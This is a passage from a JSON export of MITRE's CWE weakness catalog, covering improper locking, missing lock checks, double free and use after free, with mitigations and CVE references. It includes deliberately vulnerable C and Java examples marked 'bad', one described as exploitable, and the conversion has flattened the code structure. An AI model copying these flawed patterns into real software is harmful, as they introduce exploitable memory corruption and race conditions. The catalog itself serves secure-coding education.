f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"Intro_Text":"This Java example shows a simple BankAccount class with deposit and withdraw methods.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private double accountBalance;public BankAccount() {}public void deposit(double depositAmount) {}public void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// variable for bank account balance","// constructor for BankAccount","// method to deposit amount into BankAccount","// method to withdraw amount from BankAccount","// other methods for accessing the BankAccount object"],"xhtml:div":[{"#text":"accountBalance = 0;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance + depositAmount;accountBalance = newBalance;","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance;","xhtml:br":["",""]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...public synchronized void deposit(double depositAmount) {}public synchronized void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","",""],"xhtml:i":["// synchronized method to deposit amount into BankAccount","// synchronized method to withdraw amount from BankAccount"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...private ReentrantLock balanceChangeLock;private Condition sufficientFundsCondition;public void deposit(double amount) {}public void withdraw(double amount) {}...","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// lock object for thread access to methods","// condition object to temporarily release lock to other threads","// method to deposit amount into BankAccount","// method to withdraw amount from bank account"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"balanceChangeLock.lock();try {} catch (Exception e) {...}finally {}","xhtml:br":["","","",""],"xhtml:i":"// set lock to block access to BankAccount from other threads","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = balance + amount;balance = newBalance;sufficientFundsCondition.signalAll();","xhtml:br":["","","","",""],"xhtml:i":"// inform other threads that funds are available"}},{"#text":"// unlock lock objectbalanceChangeLock.unlock();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"balanceChangeLock.lock();try {} catch (Exception e) {...}finally {}","xhtml:br":["","","",""],"xhtml:i":"// set lock to block access to BankAccount from other threads","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (balance &lt; amount) {}double newBalance = balance - amount;balance = newBalance;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sufficientFundsCondition.await();","xhtml:br":["","","",""],"xhtml:i":["// temporarily unblock access","// until sufficient funds are available"]}},"xhtml:br":["","",""]}},{"#text":"// unlock lock objectbalanceChangeLock.unlock();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}}}}],"Body_Text":["However, the deposit and withdraw methods have shared access to the account balance private class variable. This can result in a race condition if multiple threads attempt to call the deposit and withdraw methods simultaneously where the account balance is modified by one thread before another thread has completed modifying the account balance. For example, if a thread attempts to withdraw funds using the withdraw method before another thread that is depositing funds using the deposit method completes the deposit then there may not be sufficient funds for the withdraw transaction.","To prevent multiple threads from having simultaneous access to the account balance variable the deposit and withdraw methods should be synchronized using the synchronized modifier.","An alternative solution is to use a lock object to ensure exclusive access to the bank account balance variable. As shown below, the deposit and withdraw methods use the lock object to set a lock to block access to the BankAccount object from other threads until the method has completed updating the bank account balance variable."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Resource Locking"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK00-J","Entry_Name":"Use private final lock objects to synchronize classes that may interact with untrusted code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example"},"Previous_Entry_Name":{"#text":"Insufficient Resource Locking","attr":{"@_Date":"2010-09-27"}}}},"414":{"attr":{"@_ID":"414","@_Name":"Missing Lock Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product does not check to see if a lock is present before performing sensitive operations on a resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Implement a reliable lock mechanism."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1056","Description":"Product does not properly check if a lock is present, allowing other attackers to access functionality.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1056"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Lock Check"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"415":{"attr":{"@_ID":"415","@_Name":"Double Free","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations.","Extended_Description":"When a program calls free() twice with the same argument, the program\'s memory management data structures become corrupted. This corruption can cause the program to crash or, in some circumstances, cause two later calls to malloc() to return the same pointer. If malloc() returns the same value twice and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"825","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1341","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"416","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Double-free"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Doubly freeing memory may result in a write-what-where condition, allowing an attacker to execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"Ensure that each allocation is freed only once. After freeing a chunk, set the pointer to NULL to ensure the pointer cannot be freed again. In complicated error conditions, be sure that clean-up routines respect the state of allocation properly. If the language is object oriented, ensure that object destructors delete each chunk of memory only once."},{"Phase":"Implementation","Description":"Use a static analysis tool to find double free instances."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code shows a simple example of a double free vulnerability.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]},{"Intro_Text":"While contrived, this code should be exploitable on Linux distributions which do not ship with heap-chunk check summing turned on.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;unistd.h&gt;#define BUFSIZE1 512#define BUFSIZE2 ((BUFSIZE1/2) - 8)int main(int argc, char **argv) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"char *buf1R1;char *buf2R1;char *buf1R2;buf1R1 = (char *) malloc(BUFSIZE2);buf2R1 = (char *) malloc(BUFSIZE2);free(buf1R1);free(buf2R1);buf1R2 = (char *) malloc(BUFSIZE1);strncpy(buf1R2, argv[1], BUFSIZE1-1);free(buf2R1);free(buf1R2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""]}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2004-0642","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0642"},{"Reference":"CVE-2004-0772","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772"},{"Reference":"CVE-2005-1689","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1689"},{"Reference":"CVE-2003-0545","Description":"Double free from invalid ASN.1 encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0545"},{"Reference":"CVE-2003-1048","Description":"Double free from malformed GIF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1048"},{"Reference":"CVE-2005-0891","Description":"Double free from malformed GIF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0891"},{"Reference":"CVE-2002-0059","Description":"Double free from malformed compressed data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0059"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"DFREE - Double-Free Vulnerability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Double Free"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Doubly freeing memory"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM00-C","Entry_Name":"Allocate and free memory in the same module, at the same level of abstraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM01-C","Entry_Name":"Store a new value in pointers immediately after free()"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory exactly once"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Double Frees&#34;, Page 379"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"This is usually resultant from another weakness, such as an unhandled error or race condition between threads. It could also be primary to weaknesses such as buffer overflows.","attr":{"@_Type":"Relationship"}},{"#text":"It could be argued that Double Free would be most appropriately located as a child of \\"Use after Free\\", but \\"Use\\" and \\"Release\\" are considered to be distinct operations within vulnerability theory, therefore this is more accurately \\"Release of a Resource after Expiration or Release\\", which doesn\'t exist yet.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Theoretical_Notes"}]}},"416":{"attr":{"@_ID":"416","@_Name":"Use After Free","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Stable"},"Description":"Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.","Extended_Description":{"xhtml:p":["The use of previously-freed memory can have any number of adverse consequences, ranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw. The simplest way data corruption may occur involves the system\'s reuse of the freed memory. Use-after-free errors have two common and sometimes overlapping causes:","In this scenario, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process.","If the newly allocated data chances to hold a class, in C++ for example, various function pointers may be scattered within the heap data. If one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances.","Confusion over which part of the program is responsible for freeing the memory."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"825","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Dangling pointer"},{"Term":"Use-After-Free"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Memory","Note":"The use of previously freed memory may corrupt valid data, if the memory area in question has been allocated and used properly elsewhere."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If chunk consolidation occurs after the use of previously freed data, the process may crash when invalid data is used as chunk information."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If malicious data is entered before chunk consolidation can take place, it may be possible to take advantage of a write-what-where primitive to execute arbitrary code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;unistd.h&gt;#define BUFSIZER1 512#define BUFSIZER2 ((BUFSIZER1/2) - 8)int main(int argc, char **argv) {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"char *buf1R1;char *buf2R1;char *buf2R2;char *buf3R2;buf1R1 = (char *) malloc(BUFSIZER1);buf2R1 = (char *) malloc(BUFSIZER1);free(buf2R1);buf2R2 = (char *) malloc(BUFSIZER2);buf3R2 = (char *) malloc(BUFSIZER2);strncpy(buf2R1, argv[1], BUFSIZER1-1);free(buf1R1);free(buf2R2);free(buf3R2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""]}}}},{"Intro_Text":"The following code illustrates a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4168","Description":"Use-after-free triggered by closing a connection while data is still being transmitted.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4168"},{"Reference":"CVE-2010-2941","Description":"Improper allocation for invalid data leads to use-after-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941"},{"Reference":"CVE-2010-2547","Description":"certificate with a large number of Subject Alternate Names not properly handled in realloc, leading to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2547"},{"Reference":"CVE-2010-1772","Description":"Timers are not disabled when a related object is deleted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1772"},{"Reference":"CVE-2010-1437","Description":"Access to a \\"dead\\" object that is being cleaned up","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437"},{"Reference":"CVE-2010-1208","Description":"object is deleted even with a non-zero reference count, and later accessed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1208"},{"Reference":"CVE-2010-0629","Description":"use-after-free involving request containing an invalid version number","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0629"},{"Reference":"CVE-2010-0378","Description":"unload of an object that is currently being accessed by other functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0378"},{"Reference":"CVE-2010-0302","Description":"incorrectly tracking a reference count leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0302"},{"Reference":"CVE-2010-0249","Description":"use-after-free related to use of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249"},{"Reference":"CVE-2010-0050","Description":"HTML document with incorrectly-nested tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0050"},{"Reference":"CVE-2009-3658","Description":"Use after free in ActiveX object by providing a malformed argument to a method","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3658"},{"Reference":"CVE-2009-3616","Description":"use-after-free by disconnecting during data transfer, or a message containing incorrect data types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3616"},{"Reference":"CVE-2009-3553","Description":"disconnect during a large data transfer causes incorrect reference count, leading to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553"},{"Reference":"CVE-2009-2416","Description":"use-after-free found by fuzzing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416"},{"Reference":"CVE-2009-1837","Description":"Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837"},{"Reference":"CVE-2009-0749","Description":"realloc generates new buffer and pointer, but previous pointer is still retained, leading to use after free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0749"},{"Reference":"CVE-2010-3328","Description":"Use-after-free in web browser, probably resultant from not initializing memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3328"},{"Reference":"CVE-2008-5038","Description":"use-after-free when one thread accessed memory that was freed by another thread","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5038"},{"Reference":"CVE-2008-0077","Description":"assignment of malformed values to certain properties triggers use after free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0077"},{"Reference":"CVE-2006-4434","Description":"mail server does not properly handle a long header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4434"},{"Reference":"CVE-2010-2753","Description":"chain: integer overflow leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753"},{"Reference":"CVE-2006-4997","Description":"freed pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4997"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Use After Free"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using freed memory"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM00-C","Entry_Name":"Allocate and free memory in the same module, at the same level of abstraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM01-C","Entry_Name":"Store a new value in pointers immediately after free()"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer 